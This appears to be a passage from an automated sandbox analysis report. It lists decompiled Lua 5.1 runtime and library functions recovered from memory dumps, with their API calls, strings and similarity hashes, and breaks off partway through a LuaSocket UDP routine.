0x10010574

APIs

luaL_checktype.LUA5.1(?,00000002,00000005), ref: 1001053A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

Part of subcall function 10010470: lua_type.LUA5.1(?,00000001,?,?), ref: 1001047C
Part of subcall function 10010470: lua_pushvalue.LUA5.1(?,00000001,?,?), ref: 1001048C

lua_pushvalue.LUA5.1(?,00000002,?,00000000,?,00000002,00000005), ref: 1001054A
lua_isnumber.LUA5.1(?,00000001,?,00000002,?,00000000,?,00000002,00000005), ref: 10010552
lua_tonumber.LUA5.1(?,00000001), ref: 10010561
lua_pushthread.LUA5.1(?), ref: 10010577
lua_insert.LUA5.1(?,000000FE,?), ref: 1001057F
lua_setfenv.LUA5.1(?,000000FE,?,000000FE,?), ref: 10010587
lua_iscfunction.LUA5.1(?,000000FE), ref: 10010596
lua_setfenv.LUA5.1(?,000000FE), ref: 100105A5
luaL_error.LUA5.1(?,'setfenv' cannot change environment of given object), ref: 100105B7

Strings

'setfenv' cannot change environment of given object, xrefs: 100105B1

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.lua_setfenv.lua_type.$L_checktype.L_error.lua_insert.lua_iscfunction.lua_isnumber.lua_pushthread.lua_tonumber.
String ID: 'setfenv' cannot change environment of given object
API String ID: 1601422258-2037046198
Opcode ID: b09b4629f7ba3d950cbf37f5e76e0b878c0327253e4df6e7a10ab35d3445e35e
Instruction ID: d19b6afa919b86bf0e08ad28b2b698b561fd737f269e0e738d6d767a84905df2
Opcode Fuzzy Hash: b09b4629f7ba3d950cbf37f5e76e0b878c0327253e4df6e7a10ab35d3445e35e
Instruction Fuzzy Hash: DA016269615A2131FA01E2243D43FDF204A8F027E9F144220F954790DBEF99B79205AE

Uniqueness

Uniqueness Score: -1.00%

Function 10011F30, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011F30(void* __ebx, void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t7;
				void* _t8;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;
				void* _t18;

				_t22 = __eflags;
				_t14 = __ecx;
				_t16 = _a4;
				E1000F470(__ebx, __eflags, _a4, 1);
				_t15 = E10001810(__eflags, _t16, 1);
				E10001B90(_t14, _t22, _t16, 0xffffd8f0, "FILE*");
				_t18 = _t17 + 0x1c;
				_t23 = _t15;
				if(_t15 == 0) {
					L6:
					E100018C0(_t16);
					return 1;
				} else {
					_t7 = E10001CC0(_t23, _t16, 1);
					_t18 = _t18 + 8;
					_t24 = _t7;
					if(_t7 == 0) {
						goto L6;
					} else {
						_t8 = E10001530(_t24, __fp0, _t16, 0xfffffffe, 0xffffffff);
						_t18 = _t18 + 0xc;
						if(_t8 == 0) {
							goto L6;
						} else {
							if( *_t15 != 0) {
								E10001930(_t16, "file", 4);
								return 1;
							} else {
								E10001930(_t16, "closed file", 0xb);
								return 1;
							}
						}
					}
				}
			}

0x10011f30
0x10011f30
0x10011f31
0x10011f39
0x10011f51
0x10011f53
0x10011f58
0x10011f5b
0x10011f5d
0x10011fb4
0x10011fb5
0x10011fc4
0x10011f5f
0x10011f62
0x10011f67
0x10011f6a
0x10011f6c
0x00000000
0x10011f6e
0x10011f73
0x10011f78
0x10011f7d
0x00000000
0x10011f7f
0x10011f82
0x10011fa4
0x10011fb3
0x10011f84
0x10011f8c
0x10011f9b
0x10011f9b
0x10011f82
0x10011f7d
0x10011f6c

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 10011F39

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_touserdata.LUA5.1(?,00000001,?,00000001), ref: 10011F41
lua_getfield.LUA5.1(?,FFFFD8F0,FILE*,?,00000001,?,00000001), ref: 10011F53

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_getmetatable.LUA5.1(?,00000001), ref: 10011F62
lua_rawequal.LUA5.1(?,000000FE,000000FF), ref: 10011F73
lua_pushlstring.LUA5.1(?,closed file,0000000B), ref: 10011F8C

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

lua_pushlstring.LUA5.1(?,file,00000004), ref: 10011FA4
lua_pushnil.LUA5.1(?), ref: 10011FB5

Strings

closed file, xrefs: 10011F86
FILE*, xrefs: 10011F46
file, xrefs: 10011F9E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_pushlstring.$L_argerror.L_checkany.lua_getfield.lua_getmetatable.lua_pushnil.lua_rawequal.lua_touserdata.lua_type.
String ID: FILE*$closed file$file
API String ID: 2606800232-1636238272
Opcode ID: adde3ff7b4020ee864eefffddb59ab1b470a517c85fde345a76944f5fb38f400
Instruction ID: e02318f684c305e6a9e8092004a483cbc88ef7b709e5fb69dc9fc51cc3ad5608
Opcode Fuzzy Hash: adde3ff7b4020ee864eefffddb59ab1b470a517c85fde345a76944f5fb38f400
Instruction Fuzzy Hash: DB018B7E65952131F911A11C7C02FCA2189CF812E5F150135F914691C7FB76E6D341EA

Uniqueness

Uniqueness Score: -1.00%

Function 100134F0, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100134F0(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t12;
				void* _t19;

				_t19 = __eflags;
				_t12 = __ecx;
				_t15 = _a4;
				E1000F6F0(_a4, "math", 0x100177c8);
				E100018E0(_t15, 0x54442d18, 0x400921fb);
				E10001DD0(_t12, _t19, _t15, 0xfffffffe, "pi");
				_t13 =  *((intOrPtr*)(__imp___HUGE + 4));
				E100018E0(_t15,  *__imp___HUGE,  *((intOrPtr*)(__imp___HUGE + 4)));
				E10001DD0( *((intOrPtr*)(__imp___HUGE + 4)), _t19, _t15, 0xfffffffe, "huge");
				E10001B90(_t13, _t19, _t15, 0xffffffff, "fmod");
				E10001DD0(_t13, _t19, _t15, 0xfffffffe, "mod");
				return 1;
			}

0x100134f0
0x100134f0
0x100134f1
0x10013500
0x10013510
0x1001351d
0x10013527
0x1001352f
0x1001353c
0x10013549
0x10013559
0x10013567

APIs

luaL_register.LUA5.1(?,math,100177C8), ref: 10013500

Part of subcall function 1000F6F0: luaL_openlib.LUA5.1(?,?,?,00000000), ref: 1000F701

lua_pushnumber.LUA5.1(?,54442D18,400921FB,?,math,100177C8), ref: 10013510
lua_setfield.LUA5.1(?,000000FE,1001A3E8,?,54442D18,400921FB,?,math,100177C8), ref: 1001351D

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

lua_pushnumber.LUA5.1(?,?,?,?,000000FE,1001A3E8,?,54442D18,400921FB,?,math,100177C8), ref: 1001352F
lua_setfield.LUA5.1(?,000000FE,huge,?,?,?,?,000000FE,1001A3E8,?,54442D18,400921FB,?,math,100177C8), ref: 1001353C
lua_getfield.LUA5.1(?,000000FF,fmod,?,000000FE,huge,?,?,?,?,000000FE,1001A3E8,?,54442D18,400921FB,?), ref: 10013549

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_setfield.LUA5.1(?,000000FE,mod), ref: 10013559

Strings

fmod, xrefs: 10013541
math, xrefs: 100134FA
huge, xrefs: 10013534
mod, xrefs: 10013551

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$S_newlstr.lua_pushnumber.$L_openlib.L_register.lua_getfield.
String ID: fmod$huge$math$mod
API String ID: 3660912427-2781356510
Opcode ID: f35251b065affb9c56340d740e13195d303366406bd9dcae72a11a1dc6e61a4e
Instruction ID: 23c21f1aef0c8753b55469bc739b4939c1c3faa8b27fc40f68cfef374e26b998
Opcode Fuzzy Hash: f35251b065affb9c56340d740e13195d303366406bd9dcae72a11a1dc6e61a4e
Instruction Fuzzy Hash: D3F0827844942137A402E214AC42EDF2699DF972F1B204310F6303A2D7DF64BBC211E9

Uniqueness

Uniqueness Score: -1.00%

Function 00A23AD0, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00A23AD0(intOrPtr* __eax, void* __esi) {

				_push(0xa25640);
				_push(0);
				L00A23FF2();
				_push(7);
				_push("windows");
				L00A23FC8();
				_push("platform");
				_push(0xfffffffe);
				L00A23F3E();
				_push(8);
				L00A23F2C();
				_push("alien_library");
				_push(0xffffd8f0);
				 *__eax = 0;
				 *(__eax + 4) = "default";
				L00A23F02();
				_push(0xfffffffe);
				L00A23F1A();
				_push("default");
				_push(0xfffffffe);
				L00A23F3E();
				return 1;
			}

0x00a23ad0
0x00a23ad5
0x00a23ad8
0x00a23add
0x00a23adf
0x00a23ae5
0x00a23aea
0x00a23aef
0x00a23af2
0x00a23af7
0x00a23afa
0x00a23aff
0x00a23b04
0x00a23b0a
0x00a23b10
0x00a23b17
0x00a23b1c
0x00a23b1f
0x00a23b27
0x00a23b2c
0x00a23b2f
0x00a23b3c

APIs

luaL_register.LUA5.1(?,00000000,00A25640,00A23EE2), ref: 00A23AD8
lua_pushlstring.LUA5.1(?,windows,00000007,?,00000000,00A25640,00A23EE2), ref: 00A23AE5
lua_setfield.LUA5.1(?,000000FE,platform,?,windows,00000007,?,00000000,00A25640,00A23EE2), ref: 00A23AF2
lua_newuserdata.LUA5.1(?,00000008,?,000000FE,platform,?,windows,00000007,?,00000000,00A25640,00A23EE2), ref: 00A23AFA
lua_getfield.LUA5.1(?,FFFFD8F0,alien_library,?,00000008,?,000000FE,platform,?,windows,00000007,?,00000000,00A25640,00A23EE2), ref: 00A23B17
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_library,?,00000008,?,000000FE,platform,?,windows,00000007,?,00000000,00A25640), ref: 00A23B1F
lua_setfield.LUA5.1(?,000000FE,default), ref: 00A23B2F

Strings

alien_library, xrefs: 00A23AFF
platform, xrefs: 00A23AEA
default, xrefs: 00A23B10, 00A23B27
windows, xrefs: 00A23ADF

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$L_register.lua_getfield.lua_newuserdata.lua_pushlstring.lua_setmetatable.
String ID: alien_library$default$platform$windows
API String ID: 3847922017-1031157753
Opcode ID: 7349fc7e680b4e9545f18f5e1916c5d612d91dfc6aa9b59d7b50bfa89ff9e8cf
Instruction ID: c73cfb62213f511c4d378d89f7d464c96011c1ca54b658fb5f049a6156071eeb
Opcode Fuzzy Hash: 7349fc7e680b4e9545f18f5e1916c5d612d91dfc6aa9b59d7b50bfa89ff9e8cf
Instruction Fuzzy Hash: 49E0A572E9AA3175DD01763C7F13F5E282A3F63B60F908770B4213D1D2AAAC5A0101AA

Uniqueness

Uniqueness Score: -1.00%

Function 100090C0, Relevance: 18.2, APIs: 12, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100090C0(void* __eflags) {
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t87;
				intOrPtr* _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t119;

				_t118 =  *((intOrPtr*)(_t119 + 0xc));
				_t116 =  *((intOrPtr*)(_t118 + 0x30));
				_t87 =  *((intOrPtr*)(_t118 + 0x34));
				_t117 =  *_t116;
				E100092B0(_t118, 0);
				E10002700(_t116, 0, 0);
				_t59 =  *(_t116 + 0x18);
				if( *(_t116 + 0x18) + 1 > 0x3fffffff) {
					_t60 = E100088B0(_t87);
				} else {
					_t60 = E100088D0(_t87,  *((intOrPtr*)(_t117 + 0xc)),  *(_t117 + 0x2c) << 2, _t59 * 4);
				}
				 *((intOrPtr*)(_t117 + 0xc)) = _t60;
				 *(_t117 + 0x2c) =  *(_t116 + 0x18);
				_t61 =  *(_t116 + 0x18);
				if( *(_t116 + 0x18) + 1 > 0x3fffffff) {
					_t62 = E100088B0(_t87);
				} else {
					_t62 = E100088D0(_t87,  *((intOrPtr*)(_t117 + 0x14)),  *(_t117 + 0x30) << 2, _t61 * 4);
				}
				 *((intOrPtr*)(_t117 + 0x14)) = _t62;
				 *(_t117 + 0x30) =  *(_t116 + 0x18);
				_t63 =  *(_t116 + 0x28);
				if( *(_t116 + 0x28) + 1 > 0xfffffff) {
					_t64 = E100088B0(_t87);
				} else {
					_t64 = E100088D0(_t87,  *((intOrPtr*)(_t117 + 8)),  *(_t117 + 0x28) << 4, _t63 << 4);
				}
				 *((intOrPtr*)(_t117 + 8)) = _t64;
				 *(_t117 + 0x28) =  *(_t116 + 0x28);
				_t65 =  *(_t116 + 0x2c);
				if( *(_t116 + 0x2c) + 1 > 0x3fffffff) {
					_t66 = E100088B0(_t87);
				} else {
					_t66 = E100088D0(_t87,  *((intOrPtr*)(_t117 + 0x10)),  *(_t117 + 0x34) << 2, _t65 << 2);
				}
				 *((intOrPtr*)(_t117 + 0x10)) = _t66;
				 *(_t117 + 0x34) =  *(_t116 + 0x2c);
				_t68 =  *((short*)(_t116 + 0x30));
				if( *((short*)(_t116 + 0x30)) + 1 > 0x15555555) {
					_t69 = E100088B0(_t87);
				} else {
					_t69 = E100088D0(_t87,  *((intOrPtr*)(_t117 + 0x18)),  *(_t117 + 0x38) +  *(_t117 + 0x38) * 2 << 2, _t68 + _t68 * 2 << 2);
				}
				 *((intOrPtr*)(_t117 + 0x18)) = _t69;
				 *(_t117 + 0x38) =  *((short*)(_t116 + 0x30));
				if(1 > 0x3fffffff) {
					_t72 = E100088B0(_t87);
				} else {
					_t72 = E100088D0(_t87,  *((intOrPtr*)(_t117 + 0x1c)),  *(_t117 + 0x24) << 2, 0);
				}
				 *((intOrPtr*)(_t117 + 0x1c)) = _t72;
				 *(_t117 + 0x24) = 0;
				_t73 =  *((intOrPtr*)(_t116 + 8));
				 *((intOrPtr*)(_t118 + 0x30)) = _t73;
				 *((intOrPtr*)(_t87 + 8)) =  *((intOrPtr*)(_t87 + 8)) + 0xffffffe0;
				if(_t116 != 0) {
					return E10009280(_t118);
				}
				return _t73;
			}

0x100090c2
0x100090ca
0x100090cd
0x100090d1
0x100090d3
0x100090dd
0x100090e2
0x100090f1
0x10009112
0x100090f3
0x10009107
0x1000910c
0x1000911a
0x10009120
0x10009123
0x1000912f
0x10009150
0x10009131
0x10009145
0x1000914a
0x10009158
0x1000915e
0x10009161
0x1000916d
0x1000918a
0x1000916f
0x1000917f
0x10009184
0x10009192
0x10009198
0x1000919b
0x100091a7
0x100091c4
0x100091a9
0x100091b9
0x100091be
0x100091cc
0x100091d2
0x100091d5
0x100091e2
0x10009205
0x100091e4
0x100091fa
0x100091ff
0x1000920d
0x1000921c
0x10009225
0x10009246
0x10009227
0x1000923b
0x10009240
0x10009250
0x10009256
0x10009259
0x1000925c
0x10009267
0x1000926a
0x00000000
0x10009272
0x10009279

APIs

luaM_realloc_.LUA5.1(?,?,?,?,?,?,?,00000029,?), ref: 10009107
luaM_toobig.LUA5.1(?,?,?,?,00000029,?), ref: 10009112
luaM_realloc_.LUA5.1(?,?,?,?,?,?,?,?,00000029,?), ref: 10009145
luaM_toobig.LUA5.1(?,?,?,?,?,00000029,?), ref: 10009150
luaM_realloc_.LUA5.1(?,?,?,?,?,?,?,?,?,00000029,?), ref: 1000917F
luaM_toobig.LUA5.1(?,?,?,?,?,?,00000029,?), ref: 1000918A
luaM_realloc_.LUA5.1(?,?,?,?,?,?,?,?,?,?,00000029,?), ref: 100091B9
luaM_toobig.LUA5.1(?,?,?,?,?,?,?,00000029,?), ref: 100091C4
luaM_realloc_.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,00000029,?), ref: 100091FA
luaM_toobig.LUA5.1(?,?,?,?,?,?,?,?,00000029,?), ref: 10009205
luaM_realloc_.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,00000029,?), ref: 1000923B
luaM_toobig.LUA5.1(?,?,?,?,?,?,?,?,?,00000029,?), ref: 10009246

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.M_toobig.
String ID:
API String ID: 1500966413-0
Opcode ID: 09bd6e47f580dcd1dea56bd2a905a2a65a030b1d13f228b114adc1a62c91843f
Instruction ID: b14d1679c336b882108aa4155c346381c8affbeaceda9433cae1b7bc1c1e70c1
Opcode Fuzzy Hash: 09bd6e47f580dcd1dea56bd2a905a2a65a030b1d13f228b114adc1a62c91843f
Instruction Fuzzy Hash: 3D5171B4500B01AFF320DF28D881D67B3F9FB84264B448A19E95A43A96EB31F955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C1710, Relevance: 18.1, APIs: 12, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E009C1710(intOrPtr _a4) {
				char _v524;
				intOrPtr _v528;
				char _v532;
				char _v536;
				intOrPtr* _t24;
				intOrPtr* _t27;
				intOrPtr _t28;
				intOrPtr* _t35;
				intOrPtr* _t41;
				char _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr _t56;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t62;

				_t56 = _a4;
				_t24 =  &_v532;
				_t53 = 0;
				_push(_t24);
				_push(0);
				_push(1);
				_push(_t56);
				_v532 = 0;
				L009C212C();
				_t54 = _t24;
				_push(0);
				_push(0x9c3064);
				_push(3);
				_push(_t56);
				_v528 = _t54 + _v532;
				L009C212C();
				_t58 =  &_v536 + 0x20;
				_t41 = _t24;
				if(_t54 != 0) {
					_push( &_v524);
					_push(_t56);
					L009C211A();
					_t59 = _t58 + 8;
					while(_t54 < _v528) {
						_push( &_v524);
						_push(_t41);
						_push(_t53);
						_push( &_v536);
						_push( *_t54);
						_t54 = _t54 + 1;
						_t53 = E009C1870();
						_t59 = _t59 + 0x14;
					}
					_t27 =  &_v532;
					_push(_t27);
					_push(0);
					_push(2);
					_push(_t56);
					L009C212C();
					_t55 = _t27;
					_t60 = _t59 + 0x10;
					if(_t55 != 0) {
						_t28 = _t55 + _v532;
						_v528 = _t28;
						if(_t55 < _t28) {
							do {
								_push( &_v524);
								_push(_t41);
								_push(_t53);
								_push( &_v536);
								_push( *_t55);
								_t55 = _t55 + 1;
								_t53 = E009C1870();
								_t60 = _t60 + 0x14;
							} while (_t55 < _v528);
						}
						_push( &_v524);
						L009C2108();
						_push(_t53);
						_push( &_v536);
						_push(_t56);
						L009C2138();
						return 2;
					} else {
						E009C19D0( &_v536, _t53,  &_v524);
						_t35 =  &_v524;
						_push(_t35);
						L009C2108();
						_push(_t55);
						_push(0xffffffff);
						_push(_t56);
						L009C213E();
						_t62 = _t60 + 0x1c;
						if( *_t35 == 0) {
							_push(_t56);
							L009C2120();
							_t62 = _t62 + 4;
						}
						_push(_t56);
						L009C2120();
						return 2;
					}
				} else {
					_push(_t56);
					L009C2120();
					_push(_t56);
					L009C2120();
					return 2;
				}
			}

0x009c1718
0x009c1721
0x009c1725
0x009c1727
0x009c1728
0x009c1729
0x009c172b
0x009c172c
0x009c1730
0x009c1739
0x009c173b
0x009c173c
0x009c1744
0x009c1746
0x009c1747
0x009c174b
0x009c1750
0x009c1753
0x009c1757
0x009c177c
0x009c177d
0x009c177e
0x009c1787
0x009c178c
0x009c1794
0x009c1795
0x009c179a
0x009c179b
0x009c179c
0x009c179d
0x009c17a3
0x009c17a9
0x009c17ac
0x009c17b0
0x009c17b4
0x009c17b5
0x009c17b7
0x009c17b9
0x009c17ba
0x009c17bf
0x009c17c1
0x009c17c6
0x009c181a
0x009c181f
0x009c1823
0x009c1825
0x009c182b
0x009c182c
0x009c1831
0x009c1832
0x009c1833
0x009c1834
0x009c183a
0x009c1840
0x009c1843
0x009c1825
0x009c184b
0x009c184c
0x009c1855
0x009c1856
0x009c1857
0x009c1858
0x009c186f
0x009c17c8
0x009c17d3
0x009c17d8
0x009c17dc
0x009c17dd
0x009c17e2
0x009c17e3
0x009c17e5
0x009c17e6
0x009c17ed
0x009c17f2
0x009c17f4
0x009c17f5
0x009c17fa
0x009c17fa
0x009c17fd
0x009c17fe
0x009c1815
0x009c1815
0x009c1759
0x009c1759
0x009c175a
0x009c175f
0x009c1760
0x009c1777
0x009c1777

APIs

luaL_optlstring.LUA5.1(?,00000001,00000000,?), ref: 009C1730
luaL_optlstring.LUA5.1(?,00000003,009C3064,00000000,?,00000001,00000000,?), ref: 009C174B
lua_pushnil.LUA5.1(?), ref: 009C175A
lua_pushnil.LUA5.1(?,?), ref: 009C1760
luaL_buffinit.LUA5.1(?,?), ref: 009C177E
luaL_optlstring.LUA5.1(?,00000002,00000000,?), ref: 009C17BA
luaL_pushresult.LUA5.1(?,?,00000000,?), ref: 009C17DD
lua_tolstring.LUA5.1(?,000000FF,00000000,?,?,00000000,?), ref: 009C17E6
lua_pushnil.LUA5.1(?), ref: 009C17F5
lua_pushnil.LUA5.1(?), ref: 009C17FE

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.$L_optlstring.$L_buffinit.L_pushresult.lua_tolstring.
String ID:
API String ID: 3302033068-0
Opcode ID: 11157c575ec623141718e140707806c0180924647cf7ba4e43eb57983dc07143
Instruction ID: 482df2c9d8d0ed7ff70a4fc577e1aaa6127277f721fbf866cfb55ed6f2353f04
Opcode Fuzzy Hash: 11157c575ec623141718e140707806c0180924647cf7ba4e43eb57983dc07143
Instruction Fuzzy Hash: 14410672D082052FD220EB18DC82FAB77DCDBC5354F440A2DFA9497103E924A90987B7

Uniqueness

Uniqueness Score: -1.00%

Function 100118D0, Relevance: 18.1, APIs: 12, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100118D0(void* __ebx, void* __ebp, void* __eflags, void* __fp0, char _a4) {
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t41;

				_t55 = __fp0;
				_t42 = _a4;
				_t41 = E10011630(__eflags, _a4,  &_a4);
				_t11 = E10001410(__eflags, _a4, _a4 + 1);
				_t53 = _t11;
				if(_t11 > 0) {
					_t14 = E1000F4A0(__eflags, _t42, _a4 + 2, 0);
					_t15 = E1000F600(__eflags, __fp0, _t42, _a4 + 3, 0);
					__eflags = _a4 + 1;
					E1000F410(_t15, _a4 + 1, _t42, _a4 + 1, 6);
					E10003EE0(_t41, E100119A0, E10011A30(_t14, _t15), _t15);
				} else {
					E10001160(_t42, _a4 + 1);
					E10003EE0(_t41, 0, 0, 0);
				}
				E10011A80(_t53, _t55, _t41);
				E10001B10(_t41, _t41);
				E100013D0(_t53, _t42, _a4 + 1);
				E10001090(_t42, _t41, 1);
				E10001E40(_t53, _t41, 0xfffffffd);
				E10001160(_t41, 0xfffffffe);
				return 0;
			}

0x100118d0
0x100118d1
0x100118e5
0x100118ea
0x100118f2
0x100118f4
0x10011920
0x10011932
0x1001193d
0x10011942
0x1001195c
0x100118f6
0x100118fd
0x10011909
0x1001190e
0x10011967
0x1001196e
0x1001197a
0x10011983
0x1001198b
0x10011993
0x1001199f

APIs

Part of subcall function 10011630: lua_type.LUA5.1(?,00000001,?,100113D5,?,?), ref: 10011638
Part of subcall function 10011630: lua_tothread.LUA5.1(?,00000001), ref: 10011652

lua_type.LUA5.1(?,?,?,?), ref: 100118EA
lua_settop.LUA5.1(?,?), ref: 100118FD
lua_sethook.LUA5.1(00000000,00000000,00000000,00000000,?,?), ref: 10011909
luaL_checklstring.LUA5.1(?,?,00000000), ref: 10011920
luaL_optinteger.LUA5.1(?,?,00000000,?,?,00000000), ref: 10011932
luaL_checktype.LUA5.1(?,?,00000006,?,?,00000000,?,?,00000000), ref: 10011942
lua_sethook.LUA5.1(00000000,100119A0,00000000,?,00000000), ref: 1001195C
lua_pushlightuserdata.LUA5.1(00000000,00000000,00000000,?,?,?,00000000), ref: 1001196E
lua_pushvalue.LUA5.1(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 1001197A
lua_xmove.LUA5.1(?,00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 10011983
lua_rawset.LUA5.1(00000000,000000FD,?,00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 1001198B
lua_settop.LUA5.1(00000000,000000FE,00000000,000000FD,?,00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 10011993

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_sethook.lua_settop.lua_type.$L_checklstring.L_checktype.L_optinteger.lua_pushlightuserdata.lua_pushvalue.lua_rawset.lua_tothread.lua_xmove.
String ID:
API String ID: 534292407-0
Opcode ID: 3c81e8853d9686c4bf3d74039fbe51481895820f1cdbeaf4b83450355e723775
Instruction ID: 8dc47a92df02fc00857607699b66b6b54f54b476b9b1ab6c16400a63b81c1dba
Opcode Fuzzy Hash: 3c81e8853d9686c4bf3d74039fbe51481895820f1cdbeaf4b83450355e723775
Instruction Fuzzy Hash: 5311B6B96041043EF105E220AC83FFF225CDFC66D4F104518F9546618BEA65BE8242B7

Uniqueness

Uniqueness Score: -1.00%

Function 00993D50, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00993D50(void* __fp0) {
				intOrPtr* _t9;
				intOrPtr* _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				char* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t39;

				_t39 = __fp0;
				_t22 =  *((intOrPtr*)(_t26 + 0x14));
				_t9 = E00991250(_t22, "udp{any}", 1);
				_push(0);
				_push(2);
				_push(_t22);
				_t25 = _t9;
				L00994B54();
				_t27 = _t26 + 0x18;
				_t16 = _t9;
				_t23 = "*";
				while(1) {
					_t20 =  *_t9;
					_t17 = _t20;
					if(_t20 !=  *_t23) {
						break;
					}
					if(_t17 == 0) {
						L5:
						 *((intOrPtr*)(_t27 + 0x14)) = 0;
						L7:
						_t10 =  *((intOrPtr*)(_t27 + 0x14));
						if( *((intOrPtr*)(_t27 + 0x14)) == 0) {
							_push(0);
							_push(0);
							_push(3);
							_push(_t22);
							L00994B72();
							_t28 = _t27 + 0x10;
						} else {
							_push(3);
							_push(_t22);
							L00994B66();
							_t28 = _t27 + 8;
						}
						L00994BD0();
						_t7 = _t25 + 8; // 0x8
						_t24 = E009917B0(_t39, _t25, _t16, _t10);
						_t29 = _t28 + 0x10;
